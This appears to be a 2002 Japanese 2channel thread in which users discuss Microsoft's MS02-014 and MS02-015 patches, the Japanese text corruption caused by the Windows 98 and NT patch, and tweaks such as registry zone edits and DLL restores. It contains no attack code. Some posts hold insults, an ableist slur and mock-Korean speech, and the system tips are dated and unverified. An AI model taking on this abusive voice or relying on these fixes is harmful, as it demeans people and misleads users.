ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥

>>381
Win98なんだけどパッチ当てたら、
ディスクのプロパティで文字化けするようになったよ。
べつにいいけどね。

なんか糞を握らされた気分。

Meは大丈夫なの?

>>382

あああ！！！ほんとだぁーー！！！
マジやばいっす！！！

>>382
うーむ。試しに弟のパソでやったら凄いことになった。自分のに当てるのは
ちょっとやめとこう。

後は、気づかれないうちに、明日実家から引き上げることを考えるか…。

＞３８５
ひでえなオイ！

日本語の詳細情報がまだ出ていないので、英語版を見てみた。
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-014.asp

今のところ問題があるのはWindows 98, 98SE, Windows NT 4.0, Windows 2000で、
Windows MeとWindows XPにはこの問題はないそうだ。

「ファイル名を指定して実行」も文字化けしてるよ（ｗ
文字化けだけで済んでくれたらいいけど。

くっそー、人柱になっちまった！！

今初めてMeであることに感謝した

âge

とりあえずMS02-014の新しい修正パッチが出るまで見送りだな。

02-014パッチ出たよ

>>385はある種、勇者だな

日本語でも詳細情報が出てる。
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
「Windows Shell の未チェックのバッファにより、コードが実行される」 (MS02-014)

パッチの不具合のことは書いてない。

ＩＥなどという、明日無きブラウザを期待している皆さんも
そうでもない皆さんも
たまには、息抜きで善行でもどうですか？

2ちゃんねらーの力で子供達を救おうよ（連日連夜　祭り開催中!）
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【ｸﾘｯｸ】 押してみっかな【ｸﾘｯｸ】
http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります

顔も知らないどこかの誰かを助けることよりも自分のパソコン守ることの
ほうが大切…








…とか言ってみるドメスト。

＞ＩＥなどという、明日無きブラウザを期待している皆さんも

違うエンジンのブラウザって、ネスケ、もじら、オペラくらいしか
知らない。どれ使ってるの〜？
もうIEやめよっかなと思ってる…。

[ファイル名を指定して実行]も文字化(;_;)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
http://download.microsoft.com/download/ie4095/actdesk/4.01_sp2/W9XNT4/JA/q313829.exe

不具合を解消する為のパッチなのに
パッチを当てたら　文字化けという不具合が生まれちまったじゃねえかよ　ヽ(`Д´)ﾉ
きちんと　日本語版パッチを当てたら元に戻るんだろうな！

つーか　英語版パッチでも　
一応、穴は埋まった事になるのか？

MD5やCRCチェックで弾かれる、普通

うぁ〜　なんだこの文字化け..............

このスレ読むまで気づかなかった　鬱

やぱりそうか・・
文字化けしてるよな
テメー　ふざけんな！　なんとかせんかい！
ったく　役所以下のデクノボー集団がよ

ｱﾌｫがいるな

MS02-014のパッチを当てても文字化けしてない人はいる？
（XP,Meは除く）

知らずにパッチをあてて見事に文字化けしてしまいました。(win98)
誰か文字化けを直す方法を教えてください。
日本語版のパッチを上からあてればよいのでせうか？

悲しいです。

パッチを当てられたアプリを洗い出してオリジナルを上書きだろうな
で、またパッチを当てる

ふっ、ごくろうさん

>>404
win98だけど、ぜんぜん化けないよ。

文字バケスレ立ててもうた

(1) Windows\Option\Cabs の中の Win98_xx.cab (xx は Windows 98,
Windows 98 SE ともに 50 のあたりと思われる）から Shell32.dll
を抽出する。

(2) Dos モードにして Windows\System ディレクトリの同名ファイルに
上書きする。

文字化けは以上で直ります。

>>408
勇者だな

すまん。やっぱり化けていた！

>>409
サンキュ
cab内探すのってめんどいやね

あ〜あ　先にこのスレ見ときゃＤＬしなかったのに・・
ところであの極悪欠陥商品販売会社はウンとかスンとか言わないのか？
ＤＬしてるけど気付いてない人結構多いと思うよ

入れるのは止めとくか、しかし何だかなぁ本末転倒だな。

M$からダウンロードする場合
誰かが人柱になってからだな
出たらすぐに当てるという条件反射はいかん
M$とyahooは信用できん　飛び付くとエライ目に合う
これ定説

でも、今回はバグの内容が内容だけに、入れた方がいいかと。
俺もすぐに突っ込んで激しく後悔したくちだが。

>>409
サンクス。これでとりあえず弟のマシンは直した（逃走失敗で捕まっていた）。
でも、これだとパッチが当たってない状態に戻ったってことかな。IEのバージョン
情報を見ると、パッチが当たっていることになってるけど、信用できんな。

ところで、日本語の説明ページの

＞既定では、この脆弱性はリモートで利用することはできません。
＞しかし、非常に特別な状況下では、Web ページを介してこの脆弱性を
＞利用することができる可能性があります。具体的には、ユーザーが
＞カスタム URL ハンドラがあるアプリケーションをインストールし、
＞次にアンインストールし、さらにアプリケーションのアンインストール
＞ルーチンが正常にアプリケーションを完全に削除しなかった場合、
＞攻撃者はバッファのオーバーランを発生させようとする HTML Web
＞ページを作成し、攻撃を仕掛けようとする可能性があります。

を見ると、何か凄く特異な例って気がするが、このカスタム URL ハンドラ
があるアプリケーションってどんなのかね？やっぱり問題あるのはMS製品
かな？OutlookExpとか。

windows2000sp2 IE5.5sp2 Q316059 に
問題のQ313829_W2K_SP3_X86_JA.exe
を当てたけど特に問題ないよ？

見方が悪いのかな？どこを見れば一番わかるの？

>>418
いや、ここで騒いでるのは、Win98での不具合と思われ。マイコンピュータで
適当なドライブのプロパティを表示して何もなってなければ問題ないんじゃ
ないかな？

なんか、のーてんきなヤツが、
のほほーんしてるのが、
いいのかな？っと。

こっちは、はぎしりモードだけんどもよぉｺﾞﾙｧ＞Ｍ＄

Windows Shell の未チェックのバッファにより、コードが実行される (MS02-014)
（2002年3月8日： 日本語情報、及び殆どのパッチ公開、最大深刻度 : 中）

＊悪意のある攻撃者から、未チェックのバッファを利用して任意のプログラムを
実行される可能性があるという、非常に危険度が高いセキュリティ・ホールです。
決して、マイクロソフトの記述のように「最大深刻度 : 中」ではありません。

M$から文字化けについての公式発表まだだよね？

>>419
「ドライブのプロパティ」＋「ショートカットのプロパティ」＋「ファイル名を指定して実行」

この問題って、これまでで最大の潜在的危険を伴っているんでは？！

>>425
Win2000とWin98じゃなければ、問題ないようだけど。

漏れ的にはフシアナトラップの方が痛かった。
あれは何度も泣いた。

>>426
まさにWin2Kだからねぇ・・・

>>427
SP3のベータがテスト中だと聞いたけど。
またデビューは遠くなったね。

うがー、化けちまった…日本語に直すパッチ出せ＜MS＞本末転倒だ…(T-T)

>>429
お前は>>409を読んだんかと問いたい、問い掛けたい、小一時間ほど問い掛けたい

今さっき入れたwin2k。

>>409
そんなめんどくさい事をしなくても
システムファイルチェッカー（sfc）でShell32.dllを抽出して再起動。
これで一発。

入れたらところどころ英語になっちまった

>>433
仕様だそうです。

>>433
マジっすか？

NTなんだけど、「名前を指定して実行」に別のメモリ領域で実行するチェック
ボックスがあったのが"Run in..."と英語になってる
ファイルのプロパティで「全般」が"General"で表示が全部英語になったけど
なんで「バイト」だけそのままなんだろう
ディレクトリのプロパティは「圧縮」がCompressに変わって、ドライブのは
「全般」に出るチェックボックスが"Compress C:\"というようになってる
「ツール」のタブは名前が変わってないけどチェックディスク、バックアップ、
デフラグの説明が英語に変わってる。でもボタンは日本語のまま
フォントもばらばら
これの修正版が出るとしたらq313829から番号が上がるんだろうか。だとしたら
IEの「更新バージョン」がまた増えちまうよ

Meでよかった

えーちょっと待った
なんかよくわからんけどこれって２Ｋは関係無いよね？
当てたけど別に化けたりしてないぞう

98だと化けるらしい

>>436
Win2kでは大丈夫みたい。

win2kで入れてみたけど、全然問題なし。

やっぱ２Ｋなら問題無いのか　よかった・・・

つかもうＩＥには愛想がつきた・・・
もじらにします　長い間ありがとうございました　どうか探さないで下さい

>442
今回のはIEのホールではありません。
決別したかったら、Windowsからどーぞ。

442はおもろいやつやな

>>444
多分、問題が何なのかもあまり分かっていないんだと思われ(藁

ネタなのかもね。

OSME IE6です、インストするとエラーが出てアップデート出来ません。
串もファイヤウォールも、切ってあります。
原因はなんでしょうか？
　　↓
セキュリティ問題の修正プログラム - 2002 年 2 月 14 日 (Internet Explorer 6)
309 KB/ ダウンロード所要時間: < 1 分
この修正プログラムによって、Windows Millennium Edition (以下、Windows Me)、
Windows 98、および Windows NTR 4.0 の Internet Explorer 6 に存在する「Internet Explorer
での不正な VBScript の処理によって、Web ページからローカル ファイルを読み取ることができる」脆弱性 (セキュリティ情報 MS02-009) が修正されます
。 今すぐダウンロードして、悪意のあるユーザーが不正な Web サイトを悪用して、ローカル コンピュータのファイルの内容を読み取ることができないようにしてください。
最初にお読みください

>446
WindowsInstallerのバージョンが古いのかも

MS02-014に関してwinNT4.0(ie4.0アクティブデスクトップ利用向け）用のパッチとwin98のパッチが同じダウンロード先なんですが、98が文字化けするのはこのせいですかね。

http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
は、一時的にページにアクセスできなくなっていますが、
http://www.microsoft.com/japan/technet/security/bulletin/ms02-014ov.asp
は、まだ生きてるようです（パッチ）。

450

パッチインストールしないで、被害に有った人はいますか？
居ない様な気がする。

>>451
ここにいる奴のほとんどは技術的な説明を読んでないｱﾌｫばかりだろ？
ほっとけよ。

>>451
被害にあってからじゃ遅い

>>448
Win2kで文字化けが起こらないのがなぜか、今更気付いた。

>>445
アンタ詳しい人と見た！

窓の杜の記事が書き直されてる

>>455=>>445
ていうか自作自演と見た！

インターネットオプションのページでマイコンピュータが表示されないと
危険らしいのですが、うちでは表示されません。どうすれば表示されますか？

>>458
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\flags
の値を32引いたものにする。
俺のマシンは1

http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
復帰。ただし、
＞* Windows NT 98/98 Second Edition 用の修正プログラムに関しましては
＞現在ダウンロードを停止しております。準備ができ次第、このページにて、
＞お知らせします。
との事。要するに、文字化けバグ直し中ってことかな？

>>459
サンキュ

Windows Shell の未チェックのバッファにより、コードが実行される (MS02-014)
（2002年3月8日： 日本語情報、及び殆どのパッチ公開、最大深刻度 : 中）
　＊悪意のある攻撃者から、未チェックのバッファを利用して任意のプログラムを実行される可能性があるという、
非常に危険度が高いセキュリティ・ホールです。決して、マイクロソフトの記述のように「最大深刻度 : 中」
ではありません。

はよ文字化けバグ直せやマイクソ！！

マイクソ
XBOX の対応で、ラオックス、サトウが、販売中止したように、
毎糞は、家電やゲームなどに、入り込む場所は ありません。
彼（ゲイツ）には「お客さま」という意識が無いのですから。

そんなに言うんだったらwindows使うのやめろよ

とたんにサクサク、WARPを使え。

＞４５８
ええええ？？
どゆこと？？ＩＥの設定メニューの中にってこと？

>>467
セキュリティのタブ

えええええええ！？
無いよそんなの最初ッカラ

インターネット
イントラネット
信頼済みサイト
制限付きサイト

こんだけ。
皆は違うの？

>>469
ログ嫁

あんまり古いところの >> を示すなよ
いちいちそこまでたどることは、
やらないんでね

2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする（MS02-013）
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/

>>457
違うんだけどな・・・(´･ω･`)ｼｮﾎﾞｰﾝ

>>471
氏ね。
自分で調べないやつは、ここ見るなよ。

とりあえず>>459さんのレスを見てやってみました。
要するにこれでローカルでも Java とか ActiveX とかが
動かなくなるように出来るわけですか。ふむ。

おぅ!!
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
のDWORD値"Flags"のデータ値を"1"にしたらインターネットオプションのセキュリティタブ以下に、
いままで無かった「マイコンピュータ」のアイコンが!!!
こんなのいまさら知った…
おかげでばっちり設定しました。イエイ!!

>>459
情報サンクス子!(･∀･)

＞HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
＞のDWORD値"Flags"のデータ値を"1"･･･
これをやるとNorton Antivirusとかおかしくならない？

どういうふうに？

あ！
スクリーンセーバが動かなくなったヽ（´ー｀）ﾉ
仕方ないな　もっと地味な奴に変えよう

ネット観覧してると、いきなりＦＤが起動してフリーズします。
ＩＥの故障かと思い修復したのですが、やはり同じ症状が起きます。
ＩＥ６ダウソしてから、起るような気がします、パッチは当ててません。
原因なんでしょうか？

ほらよっ

http://www.microsoft.com/JAPAN/support/kb/articles/J052/9/81.asp
5とか6とかのゾーンも自作できるのかな?
しっかし、不明つーのはなんなんだぁぁぁぁ

MS02-014の98用のパッチはもう当てても大丈夫？

調節がムズイ(;´Д｀)
あんまり使いづらいんで多少緩めちまった

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
のDWORD値"Flags"のデータ値を"1"にしてセキュリティのマイコンピュータの設定でActiveXとかjava関係
を全部無効にした状態でNAVを立ち上げると、状態の項目が更新中になったり手動でスキャンしようとしても
動かないんだけど、NAV自体は正常に機能してるのかな？今は安全なActiveXとjavaスクリプトだけ有効に
してます、この状態ならNAVも機能してるかな。

>>482
まだダメでしょ。てゆうか、まだ公開停止中では？

マイコンピュータの設定を下手に変えると、
Explorer及びシェルのさまざま機能、HTMLヘルプ、システム情報
などなどが正しく動かなくなるけど、知らないわよ。

手動でスキャンしてみた。確かに異常jに時間かかって
変だった。けど結局ちゃんと終わって結果も表示されたよん。
これで良しとすべきかどうか。。

マイコンピュータのセキュリティの設定は
●AciveXコントロールとプラグインの実行
●スクリプトを実行しても安全だとマークされているActiveXコントロールとプラグインの実行
●アクティブスクリプト
だけ有効にして、それ以外は無効にしてる。これでNortonは普段通り動いてる
感じに見えるけど、これで他に不具合が出ないかどうかは分からない。

早速マイコンピュータの設定を見てみると
Javaの許可と安全でないActiveXコントロールのところ以外
全部有効、最高にゆるゆるの状態になっているんですけど
これってみんな初めはこうなんですか？

ていうか最初はウィンドウが開けなくなったりしたぞ(w
で、「ダイアログ表示させる」にしてみたけどこれもまたいちいち聞いてきてメンドイ(;´Д｀)

あんまり使いにくいんで結局全部元の状態に戻した
考えてみれば必要ない。

かも…



(と、付け加えてみる)

今までは、HDに保存したHTMLファイルはイントラネットのセキュリティで
実行されるのかと思っていた。HDに保存したUGサイトやアダルトサイトとかを
何回かIEで表示させちまったよ、、、。でJavaScriptもActiveXも全部切っ
てあるのに、ポップアップウィンドウがでてバナーが表示されたりしておかしいな？
とは思っていた。

CATVだから国際回線やQ2の心配はないからいいし、今のところ不具合はないけど、
ひそかにとトロイ仕込まれていたりしないか心配だ。
結構オンラインショッピングとかやっているからな、、、。クレジットカード番号が
心配。Q２とか国際回線の被害にあった人の話はよく聞くけど、ネットショッピング絡みで
クレジットカード番号を盗まれて被害にあった人というのはどのぐらい存在するのでしょうか？

マイクロソフトも最初からマイコンピューターの表示しといてほしかった。
そりゃ、マイコンピューターのセキュリティを厳しくしたら、トラブルがいろいろ起きて
使ってられんだろうけどとりあえずHDに保存したHTMLに対して、イントラネットの
セキュリティなんて誤解をすることがなしに、万全の注意を払うのに。
あー、鬱だ。鬱だ。いまさらだけど今週末にOSの再インストールでもするかな。

長文アンドなんの建設性もない愚痴でｽﾏｿ。

↑ていうか定期的にスキャンしてんだろうが
それでもまだ心配なのか???
じゃあお前はいったい何なら信用できるんだ???

理解不能だ

オレはもうダメだ。
テキスト修正でも日時が更新されて上に上がってくるので、
もうどれをダウンロードしていいのかわからなくなった。
せめて修正パッチの更新日時一覧表を作れや、ＭＳ氏ね

>>494
累積パッチとそれ以降に出たパッチを入れればいい。
ダブってもいいからもう1回入れる。

>>494 禿胴
オレはOperaにした。MS02-008のIE６用パッチがでなかなか出ないので
もう我慢できない。
ただOperaは半角カナでカキコしても全角になってしまう。

半角カナじゃなくてもざー２とかなぜか書き込めなかった＜Opera
あと、ＮＩＳを使ってると突然ブルースクリーンになったりした

>>497 スレ違いだが、Operaに http://www.moonstone.jp/ のパッチ当ててみた？

>>498　いや、膳々。こんなのあったのか。さんくす。

＞４９７
スレ違いヤメレー

SNMP サービスに含まれる未チェックのバッファにより、任意のコードが実行される (MS02-006)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-006.asp

パッチでました。

というか、SNMPってなんですか?(汗

http://www.forest.impress.co.jp/article/2002/03/11/windowsbug.html
なお同社では、8日の時点でWindows 2000用のほかに、
Windows 98/NT 4.0用の修正プログラムを公開したが、
Windows 98/NT 4.0にこの修正プログラムを適用すると
“ファイル名を指定して実行”などの一部のダイアログで文字化けが
生じる不具合が見つかり、11日深夜になって公開を中止した。
同社によると、不具合を直した新しい修正プログラムは現在開発中で、
数日中に公開する予定だという。

このスレの人柱さん達に敬礼ッ・・・
(´･ω･`)ｼｮﾎﾞｰﾝ

NTに入れたらところどころ英語になったんだけどなあ

>>481
ゾーンの自作はできるらしい
以前Win板で見かけた

あっ、私のパソの文字化けひょっとしてこのせいなのかな？？
マイコンピュータの「Ｃのプロパティ」の画面が一部変な
文字になってるんだよね。
全然関係ないか。

http://www.nai.com/japan/virusinfo/virE.asp?v=Exploit-CodeBase&menu=ThisPagePrintVersion

「xploit-CodeBaseとは、Microsoft Internet Explorerのデータバインディング脆弱性を検出したときの一般的な検出名。この脆弱性は２００２年２月２５日に発見された。」って書いてる。
これってMS02-009のことか？日付が。

>>506 3/8時点でパッチは無いっていってるから違うだろ。
つかhttp://ime.nu/www.nai.com/japan/virusinfo/virE.asp?v=Exploit-CodeBase&menu=ThisPagePrintVersion
とMS02-009は俺の貧弱な感性ではどうしても繋がらないんだが。

MS02-014のパッチが再発行されたよ!!
http://www.microsoft.com/japan/technet/security/bulletin/MS02-014.asp


変更履歴
2002/3/8: このセキュリティ情報ページを公開しました。

2002/3/15: この問題に対する Windows NT 4.0 (Active Desktop 使用環境) および
Windows 98/98 Second Edition の日本語版修正プログラムを更新しました。
また、Windows NT 4.0 (Active Desktop を使用していない環境用) の日本語版修正
プログラムを公開しました。

>>508
ショートカットアイコンの矢印を薄くしたり、なくしたりのカスタマイズが
できないまま。

>>508
難しくてよくわかりません。
Win98でサーバー立ててないネットしかしてない人は、
パッチ当てなくて大丈夫なの？
影響なしってあるけど。クライアント システムだけ中ってあるなあ。
クライアントシステムってなんなんだろう。

>>510
2ちゃんねる→インターネットサーバー
社内サーバー→イントラネットサーバー
普通の人→クライアントシステム

多少の英語とネットワークの基礎くらい理解してきなさい

>>507
漏れ的には一瞬、アリだと思ったんだけど。
「実行ファイルが起動」、という説明と日付、引っかかって。

>>509
禿同　困ったな

>>509
>>513
Win9Xなら、環境設定ってフリーソフトで、ショートカットの矢印が消せる。
どうやらTweakUIと違う事やってるようなので、TweakUIで効かなくても、
こっちで消せた。当方Win98SE。

ttp://www5a.biglobe.ne.jp/~nobukich/index_j.htm
↑ここからﾀﾞｳｿ。

>>514
消すんじゃなくて薄くしたいニダ
TWEAKUI.CPLの薄いショートカットアイコンにしたいニダ
窓の手で出来てたけどディフォルトの濃いショートカットアイコンになるニダ
たぶんレジストリ見ないでシュートカットアイコンかぶせてるニダ
バグか仕様かかわらんニダ
たぶんＭＳはサポート外で仕様と言うニダ
いやだニダ

>>515
各ショートカットアイコンを薄い矢印付きで自作して、システムが付ける矢印は
消す。

うーん。514で挙げたツール以外の環境変更ツールで、薄い矢印付けるってのは
無いかな？オレは矢印消す人なんで、困らないから探す気無いんだが…。

オンラインスキャンしたら
JS_EXCEPTION.GENに感染してました。
特に症状っぽいのは今のところでてませんが
今から駆除ります。
だれか、症状がでたという人がいたら
どんな症状なのか教えてください

>>517
聞く前に検索してみるという知恵はまわらんのか?
http://www.google.co.jp/search?hl=ja&ie=Shift_JIS&oe=Shift_JIS&q=JS_EXCEPTION.GEN&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

>>517
マルチだったのか

MS02-014
＞この修正プログラムがマシンに正しくインストールされたことを確認するために
＞は、［スタート］、[ファイル名を指定して実行] を選択し、QFECheck ユーティ
＞リティを起動してください。修正プログラムがインストールされている場合は、
＞インストールされた修正プログラムのリストに "Windows 98 Q313829 Update"
＞が表示されます。

正常にインストールされましたって窓が出たんだけどQFECheck ユーティリティを
見ても0313829が表示されてない。これってやっぱりインストールされてないですよね？心配です。

IE のバージョンを見れ

>>520
qfecheckにファイルの検索がある

>>522
qfecheckでsearchしてもqfecheckには追加されませんね

ieのバージョンにq313829と追加されていることを確認できます。

詰めが甘いねＭＳは

同意
ほんとにＭＳはクソ
いまごろｑｆｅｃｈｅｃｋしても確認できないというクレーム
が寄せられていると思われる
次のお詫び文出るまで何日かかるのでせうか？（ｗ

>>522は疑問と質問の意味が解ってないと思われ

MSのヘルプデスクでフィドバックフォームに記入して
送信できないよ
こないだはできたのに
クレーム受付拒否か？　ＭＳは

[2453] Re: およよ。
naoco さん 2002/03/17(Sun) 22:28
[f-kyoto-215072.zero.ad.jp] Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)

ドコモの子会社で働いてたころ、
PHSには今後力をいれんって力説された覚えが。

展示会とかでも、PHS用の場所って畳1枚分もなかったし。

>>520
その文章↓のように書き換えられてるよ。まるで何事もなかったかのように・・
ほんとクソ会社だな　北朝鮮以下だ

＞Windows 98 および 98 SE :
この修正プログラムがマシンに正しくインストールされたこと
を確認するためには、c:\windows\system フォルダにある
Shell32.dll のバージョン情報を確認してください。
修正プログラムがインストールされている場合には、
Shell32.dll のバージョンが、4.72.3812.600 になります。

やっぱりバックレたな　

MSクソだな、あ〜Macが欲しい

>>528
漏れMSは信頼してないけど。
「より快適に使うためのアップデートです」、なんてふざけた名目で、密かにパッチ当てさせる某社の方が嫌だ。

>>528 532
今回の件や
http://news.2ch.net/test/read.cgi/newsplus/1016455358/
でＭＳほんとに嫌いになった
Linuxも半端だし、マクーも訳わかんない方向に行ってるし
変われるＯＳ有れば換えたい
やっぱＱＮＸしかないか・・・

>>533
超漢字とか。
でも漏れ、漢字苦手だから使いこなせそうにないか（鬱

http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html

Microsoft Internet Explorer 6 には、さまざまな環境下において
ユーザの意思に関係なく、ファイルを自動的に ダウンロードし、
かつ、それを自動的に実行してしまう問題があります。
悪意ある Web サイトの管理者はこの問題を利用することのできる
悪意あるコンテンツを設置し、ユーザが Internet Explorer 6 を利用して
このコンテン ツにアクセスした場合に、
この管理者が指定した任意のプログラムはユーザのシステム上に
自動的にダウンロードされ、かつ、自動的に実行されてしまう可能性があります。

回避策:
インターネットオプション]から適切なゾーンに対して
[ファイルのダウンロード]を無効にすることでこの問題を回避することができます。

ﾏﾀｶ

http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20020319/1/

はよパッチ用意せんかい！
相変らずダンマリを決め込むのは体質だな　コメントくらいさっさと出せ！
↑のように文章の差し替えも隠れてやるし
陰険な会社だ　はよつぶれろ！　
奢れる者久しからず　満つれば欠くる　祇園精舎の鐘の声・・

これは仕様です　これは仕様です　これは仕様です

これは仕様です　これは仕様です　これは仕様です

これは仕様です　これは仕様です　これは仕様です

これは仕様です　これは仕様です　これは仕様です

これは仕様です　これは仕様です　これは仕様です

どっかのスレで、マイクロソフトは今月はバグ取り強化月間って見たなあ。
バグ強化月間だったのか(ﾜﾗｴﾅｲ

みなさん、こんばんは。
明日の夜から、札幌に行きますので、靴日記等の更新は２４日まで出来ない可能性が高いので、ご了承願います。
掲示板には、登場するつもりです。
宴に履く靴は決めていないのですが、普段履き用はやはりウェストンのゴルフにほぼ決定しました。
頑丈で連続着用にも耐えますし、カジュアルには丸みを帯びたシルエットがとてもマッチします。
フッ素加工アッパーとラバーソールで完全武装されているので、どんな天気でも気にしないですみます。
とにかく、この靴さえあれば、カジュアルには安心です。
・・・、でも、宴の当日に雨が降ったら困るので、ロジェにしようかなとも、フト思いました。

>535
> 回避策:
> インターネットオプション]から適切なゾーンに対して
> [ファイルのダウンロード]を無効にすることでこの問題を回避することができます。

ちなみに、この設定やってもWindows Updateは正常に動作するんだよなぁ。
本当にこれで対策になっているのか、甚だ疑問だ。

【勝手にDLし勝手に実行！ひとりエッチ上手なIE6】
http://pc.2ch.net/test/read.cgi/sec/1016485189/l50

>>542
それはC:\WINDOWS\Downloaded Program Files内にキャッシュされた
アップデートエンジンで動作しているためでは？

>534
それはネタか？（ｗ
食わず嫌いせずにBTRONもくうだよ

うちは、アプリ少ない欠点はあるけど、
Webブラウズの専用端末としてなら、
導入してもいいかと考え中
セキュ穴ばっかで鬱になるよりもいいかな･･･と

いい日旅立ち

振り返れば奴がいる

或る日突然（トワ・エ・モア）

http://www.microsoft.com/japan/technet/security/bulletin/ms02-015ov.asp
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-005 : 2002 年 2 月 11 日 Internet Explorer 用の累
積的な修正プログラム
http://www.microsoft.com/japan/technet/security/bulletin/ms02-005.asp
で修正された問題に加えて、新たに 2 つの問題を排除します。

MS02-008のMicrosoft XML Core Services 2.6 と 3.0　の日本語版修正プログラム
はまだか。はやくパッチかIE6.0SP1を出して欲しいぞ。

Opera使おう。もうIE使ってられないな。
IEは5か5.5か、6どれが良いんだろう。
5.5かな？

Operaは軽くて速いからいいね。IE6.0と使い分けてるよ。

「米MSがIEの新しいパッチを公開，ただし ふさげないセキュリティ・ホールも」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020329/1/

MS02-015のパッチ入れました。
今のところ不具合は無いです。

Q306121;Q313675;Q316059;Q313829;Q319182って･･･
早くSP3出しましょうよ

>>550
同志！！！

>>550
>>556
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020322

>>552
Operaは文字化けパッチやお気に入りなどの問題があって面倒だなあ。

ネスケ仕様のドーナツが出たら一番いいんだが。

>>557
ありがと。多謝なんだけど。
じゃなくて漏れが今MS02-008入れてないのは、technetで「入れてもいいけど、SP出るまで待ったほうがいいかも」的な表現だったからで。この自信無さげな文章、心に引っかかって。

「IE6SP1期待アゲの会」に一緒に入りませんか？

インプレス関係から記事が消えた．．．

MS側の不手際で取り下げ？もうインストールしたのに．．．

>>552 お気に入りはインポートできまっせ。IEと併用してるのでしょっちゅう
インポートして同期してます。
漏れも「IE6SP1期待アゲの会」賛成！

InternetExplorerの深刻なセキュリティホールを修正する累積的な修正プログラム


ZDNN：速報：MS，IEのセキュリティホール修正パッチを公開
http://www.zdnet.co.jp/news/bursts/0203/29/04.html

今回リリースされた修正パッチは，「危険度中」とされる
「悪意のあるユーザーが指定したプログラムを自動的に実行することができる」に加え，
「危険度高」の「IEのゾーン判定を回避して不正なゾーンでスクリプトを実行することができる」
という深刻なセキュリティホールを修正するもの。

MS02-015 に関する情報
http://www.microsoft.com/japan/technet/security/bulletin/ms02-015ov.asp?frame=true

この修正プログラムは、Internet Explorer に影響を及ぼす
セキュリティ上の問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-005 : 2002 年 2 月 11 日 Internet Explorer 用の
累積的な修正プログラムで修正された問題に加えて、新たに 2 つの問題を排除します。


（対象となる製品）

Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.5 Service Pack 1
Internet Explorer 5.01 Service Pack 2 (WWindows 2000 、Windows NT4.0 に組み込まれているもののみ)
注意: Internet Explorer 5.01 Service Pack 2 の修正プログラムは、Windows 2000 、Windows NT4.0
Service Pack 6a 環境でのみ適用可能です。

（詳細）

ディスク上の任意のファイルの読み取ります。
意図しないスクリプトが実行されます。
アプリケーションが実行されます。 (ハードディスクのフォーマットなど)
Windows が異常停止します。

>>562 超ガイシュツと思うけど…

人柱くんの報告では特段不具合が出てないみたいだから
新しいパッチ当てたわな

みずほ銀行誕生、システムは大丈夫か？
５８１店・３万人・７０兆円…処理が最大の懸案
　日本興業、第一勧業、富士の３行が来月１日から、「みずほ銀行」と
「みずほコーポレート銀行」に再編される。メガバンク誕生前夜、看板
かけ替えやパンフレット入れ替えなど休日返上で新たな船出に備えるこ
とになる行員も多い。なかでも最大の懸案はコンピューターシステムの
統合だ。「Ｙ２Ｋ並みの勤務態勢で万全を期す」（広報担当）と緊張が
高まっている。

ファイルの自動ダウンロード、実行問題は修正されず


http://www.forest.impress.co.jp/article/2002/03/29/iepatch.html

Internet Explorer 5.5 SP2
- http://www.asia.microsoft.com/downloads/release.asp?ReleaseID=32082
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-009.asp
- http://www.microsoft.com/japan/technet/security/bulletin/ms02-015.asp

Internet Explorer 6
- http://www.asia.microsoft.com/japan/ie/downloads/ie6/
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-008.asp (Windows Update)
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-009.asp
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-015.asp

後ろ向きな追加対策
- インターネットゾーン - ダウンロード「無効」(Irvine 等で代用)
- regsvr32 /u mstime.dll 元に戻す場合 regsvr32 mstime.dll
- スクリプト切るとポータル系が見れないという苦情がウザイので切らない

前向きな追加対策
- Interscan の導入
- 一時的に Netscape 6.2 へ移行

> - regsvr32 /u mstime.dll 元に戻す場合 regsvr32 mstime.dll
対応済み
> - スクリプト切るとポータル系が見れないという苦情がウザイので切らない
切らなかったらmstimeを切ってもまったく意味ないだろ
少しは自分の頭で考えられんのか

IE６なんですけどこれなんとかなりませんか？
q306121;q312461;q313675;q316059;q319182
IE６のSP１っていつ出るんですか？

>>569は知的障

>569
q313829は？

>>569
多分当分出ない

>>568
スクリプト切りは強制しないが自己の判断でやってくれっつーことで。
html + time は強制切りしないとスクリプト切りやっても意味ないでしょ。

で、こうするよ。

